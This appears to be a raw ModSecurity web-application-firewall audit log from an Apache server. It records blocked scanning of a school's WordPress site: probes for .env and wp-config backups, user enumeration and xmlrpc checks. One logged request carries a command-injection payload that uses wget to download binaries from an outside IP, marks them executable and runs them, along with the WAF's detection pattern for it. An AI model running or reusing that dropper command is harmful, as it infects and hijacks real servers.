OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f65a2b3a-Z-- --e324b94c-A-- [03/May/2025:16:39:43 +0700] aBXkX0SOhfQ6W15Bgg8ETAAAAFU 103.236.140.4 44504 103.236.140.4 8181 --e324b94c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.70.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.70.211 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e324b94c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e324b94c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746265183439396 842 (- - -) Stopwatch2: 1746265183439396 842; combined=377, p1=335, p2=0, p3=0, p4=0, p5=42, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e324b94c-Z-- --c8521726-A-- [03/May/2025:16:40:10 +0700] aBXkekSOhfQ6W15Bgg8ETQAAAFQ 103.236.140.4 44506 103.236.140.4 8181 --c8521726-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --c8521726-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8521726-E-- --c8521726-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746265210181388 2588 (- - -) Stopwatch2: 1746265210181388 2588; combined=861, p1=486, p2=343, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8521726-Z-- --81caa149-A-- [03/May/2025:18:15:38 +0700] aBX62oOgvPi2IO4kz1v0lgAAAIw 103.236.140.4 49854 103.236.140.4 8181 --81caa149-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: TurnitinBot (https://turnitin.com/robot/crawlerinfo.html) --81caa149-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81caa149-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746270938998585 656 (- - -) Stopwatch2: 1746270938998585 656; combined=265, p1=232, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81caa149-Z-- --c3888153-A-- [03/May/2025:20:16:39 +0700] aBYXN8P0ZqGY3Jj2X92WxAAAAA0 103.236.140.4 34320 103.236.140.4 8181 --c3888153-B-- GET /wp-config.php-old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 31.11.36.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.11.36.186 X-Forwarded-Proto: http Connection: close Accept: */* --c3888153-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3888153-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746278199986485 851 (- - -) Stopwatch2: 1746278199986485 851; combined=351, p1=308, p2=0, p3=0, p4=0, p5=43, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3888153-Z-- --823b4b7c-A-- [03/May/2025:20:16:47 +0700] aBYXP8P0ZqGY3Jj2X92WxQAAAAU 103.236.140.4 34322 103.236.140.4 8181 --823b4b7c-B-- GET /wp-config.php_old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 176.62.170.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.62.170.213 X-Forwarded-Proto: http Connection: close Accept: */* --823b4b7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --823b4b7c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746278207125408 806 (- - -) Stopwatch2: 1746278207125408 806; combined=346, p1=307, p2=0, p3=0, p4=0, p5=38, sr=139, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --823b4b7c-Z-- --3d98a405-A-- [03/May/2025:21:57:10 +0700] aBYuxkSOhfQ6W15Bgg8K4QAAAFQ 103.236.140.4 36708 103.236.140.4 8181 --3d98a405-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3d98a405-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d98a405-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746284230984456 2975 (- - -) Stopwatch2: 1746284230984456 2975; combined=1287, p1=454, p2=802, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d98a405-Z-- --bba4c018-A-- [03/May/2025:21:57:14 +0700] aBYuySleQJs6d7wanHHPlAAAANg 103.236.140.4 36712 103.236.140.4 8181 --bba4c018-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bba4c018-C-- demo.sayHello --bba4c018-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bba4c018-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746284233996058 5142 (- - -) Stopwatch2: 1746284233996058 5142; combined=3852, p1=556, p2=3093, p3=22, p4=23, p5=91, sr=151, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bba4c018-Z-- --3c3f1b2b-A-- [03/May/2025:21:57:39 +0700] aBYu44OgvPi2IO4kz1v83wAAAI4 103.236.140.4 36718 103.236.140.4 8181 --3c3f1b2b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3c3f1b2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c3f1b2b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746284259376771 3116 (- - -) Stopwatch2: 1746284259376771 3116; combined=1380, p1=515, p2=830, p3=0, p4=0, p5=35, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c3f1b2b-Z-- --d7deb042-A-- [03/May/2025:21:57:41 +0700] aBYu5YOgvPi2IO4kz1v84QAAAJU 103.236.140.4 36722 103.236.140.4 8181 --d7deb042-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d7deb042-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7deb042-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746284261580158 1985 (- - -) Stopwatch2: 1746284261580158 1985; combined=1029, p1=349, p2=654, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7deb042-Z-- --58147438-A-- [03/May/2025:21:57:42 +0700] aBYu5oOgvPi2IO4kz1v84gAAAJI 103.236.140.4 36724 103.236.140.4 8181 --58147438-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --58147438-C-- demo.sayHello --58147438-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --58147438-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746284262678196 5043 (- - -) Stopwatch2: 1746284262678196 5043; combined=3778, p1=449, p2=3115, p3=24, p4=27, p5=95, sr=68, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58147438-Z-- --1bfca203-A-- [03/May/2025:21:57:44 +0700] aBYu6IOgvPi2IO4kz1v85AAAAJM 103.236.140.4 36730 103.236.140.4 8181 --1bfca203-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1bfca203-C-- demo.sayHello --1bfca203-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1bfca203-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746284264863585 5008 (- - -) Stopwatch2: 1746284264863585 5008; combined=3919, p1=530, p2=3070, p3=23, p4=26, p5=148, sr=158, sw=122, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1bfca203-Z-- --f80d1b56-A-- [03/May/2025:21:59:48 +0700] aBYvZESOhfQ6W15Bgg8K5AAAAFg 103.236.140.4 36748 103.236.140.4 8181 --f80d1b56-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f80d1b56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f80d1b56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746284388338439 2903 (- - -) Stopwatch2: 1746284388338439 2903; combined=1258, p1=440, p2=787, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f80d1b56-Z-- --5772d307-A-- [03/May/2025:21:59:50 +0700] aBYvZoOgvPi2IO4kz1v85wAAAJg 103.236.140.4 36752 103.236.140.4 8181 --5772d307-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5772d307-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5772d307-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746284390782069 2208 (- - -) Stopwatch2: 1746284390782069 2208; combined=1124, p1=406, p2=692, p3=0, p4=0, p5=26, sr=153, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5772d307-Z-- --20baf45d-A-- [03/May/2025:21:59:52 +0700] aBYvaIOgvPi2IO4kz1v86AAAAIY 103.236.140.4 36754 103.236.140.4 8181 --20baf45d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --20baf45d-C-- demo.sayHello --20baf45d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --20baf45d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746284392130153 4704 (- - -) Stopwatch2: 1746284392130153 4704; combined=3769, p1=447, p2=3124, p3=23, p4=26, p5=87, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20baf45d-Z-- --dd754c35-A-- [03/May/2025:21:59:53 +0700] aBYvaYOgvPi2IO4kz1v86QAAAIA 103.236.140.4 36760 103.236.140.4 8181 --dd754c35-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.201 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dd754c35-C-- demo.sayHello --dd754c35-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd754c35-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746284393501499 4667 (- - -) Stopwatch2: 1746284393501499 4667; combined=3597, p1=464, p2=2935, p3=23, p4=23, p5=90, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd754c35-Z-- --3f3ddf39-A-- [03/May/2025:22:00:54 +0700] aBYvpileQJs6d7wanHHPmQAAAMo 103.236.140.4 36766 103.236.140.4 8181 --3f3ddf39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3f3ddf39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f3ddf39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746284454593059 3177 (- - -) Stopwatch2: 1746284454593059 3177; combined=1433, p1=488, p2=912, p3=0, p4=0, p5=32, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f3ddf39-Z-- --eab1c17b-A-- [03/May/2025:22:00:57 +0700] aBYvqSleQJs6d7wanHHPmwAAAMg 103.236.140.4 36770 103.236.140.4 8181 --eab1c17b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.76 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --eab1c17b-C-- demo.sayHello --eab1c17b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --eab1c17b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746284457316444 5506 (- - -) Stopwatch2: 1746284457316444 5506; combined=4336, p1=500, p2=3594, p3=39, p4=44, p5=92, sr=131, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 